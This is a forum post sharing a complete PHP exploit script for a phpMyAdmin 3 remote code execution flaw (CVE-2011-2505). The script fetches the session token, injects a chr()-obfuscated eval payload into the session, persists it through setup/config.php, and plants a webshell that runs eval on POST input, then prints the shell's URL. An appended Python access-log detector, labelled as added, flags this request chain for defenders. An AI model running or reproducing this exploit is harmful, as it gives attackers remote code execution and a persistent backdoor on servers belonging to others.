phpMyAdmin3 remote code execute PHP version exploit

OP
Posted on 2013-2-21 09:13:03
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion in the php security group about the phpMyAdmin 3 vulnerability. I hadn't read the vulnerable code before, but a while ago I did see wofeiwo's exp on Weibo. According to 黑哥 there is an exploitation method that isn't "chicken ribs" (i.e. not useless in practice), so during the night I dug through the code and wrote this reheated exp. Since I came to it late and plenty of people had already studied it and written exps, mine is just warmed-over leftovers, something to pass the time with.

First, props to wofeiwo's Python version of the exp, and props to wofeiwo and superhei for their dedication to digging in; role models to learn from. That earlier exp, however, had some limitations when exploiting:
1. it requires session.auto_start = 1;
2. in the default pma3 code the libraries directory is already blocked from access by .htaccess.
And of course there is a third hurdle nobody can get around: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really doesn't have to be that much of a chicken rib.

So I wrote this PHP version of the exp; the code is as follows:
```php
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if (strpos($returnstr, '404')) {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token = $resp[3];
$sessionid = $resp[1];
if ($token && $sessionid) {
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
// Actually, almost all the php files in home directory of pma3 can be used here.
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid);

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls')) {
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// Minimal raw HTTP client over a socket: GET when $data is empty, POST otherwise.
function php_request($url, $data = '', $cookie = '')
{
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host;
        die;
    }
    fputs($fp, $packet);

    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }

    return $resp;
}
?>
```
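As an added, defender-side example that is not part of the original post: a Python script that walks access-log lines and flags the three-step chain the exp above performs (the session-injection request carrying `session_to_unset` and `_SESSION[ConfigFile]...`, the POST to `setup/config.php` that persists it, and the fetch of a PHP file under `config/`). The Apache Common Log Format and the sample entries are assumed and constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache Common Log Format; the request line is the quoted field (assumed format).
_REQ = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample entries modelled on the three requests the exp above sends.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/index.php HTTP/1.1" 200 5123',
    '203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/db_create.php?token=abc'
    '&session_to_unset=t00ls&_SESSION%5BConfigFile%5D%5BServers%5D%5BX%5D%5Bhost%5D=t00ls.net'
    ' HTTP/1.1" 200 312',
    '203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 88',
    '203.0.113.5 - - [21/Feb/2013:09:13:06 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5',
    '198.51.100.9 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?token=def HTTP/1.1" 200 5123',
    '198.51.100.9 - - [21/Feb/2013:09:20:01 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 88',
]

def classify(line):
    """Name the chain stage a single log line matches, or None."""
    m = _REQ.match(line)
    if not m:
        return None
    # Decode percent-encoding first: the brackets in _SESSION[...] are usually URL-encoded.
    path, _, query = unquote_plus(m.group("target")).lower().partition("?")
    # Stage 1: session injection. The post notes almost any PHP file in the pma3
    # root accepts these parameters, so key on the parameters, not on db_create.php.
    if "session_to_unset=" in query and "_session[" in query:
        return "session_injection"
    # Stage 2: the setup script is asked to save the poisoned session to config/config.inc.php.
    if m.group("method") == "POST" and path.endswith("/setup/config.php"):
        return "config_write"
    # Stage 3: a PHP file under config/ is fetched (the exp checks its output this way).
    if "/config/" in path and path.endswith(".php") and m.group("status") == "200":
        return "config_fetch"
    return None

def find_chain(lines):
    """Return {ip: [stages]} for clients that completed both the injection and the save."""
    stages = {}
    for line in lines:
        stage = classify(line)
        if stage:
            stages.setdefault(_REQ.match(line).group("ip"), set()).add(stage)
    return {ip: sorted(s) for ip, s in stages.items()
            if {"session_injection", "config_write"} <= s}

if __name__ == "__main__":
    for ip, seen in find_chain(SAMPLE_LOG).items():
        print(f"[!] {ip}: {', '.join(seen)}")
```

A lone POST to `setup/config.php` (the second client) is not reported, since an administrator running setup produces the same line; the injection parameters are the discriminator. Removing the `config/` directory after setup, as phpMyAdmin's own installation notes ask, takes away the third precondition the post describes.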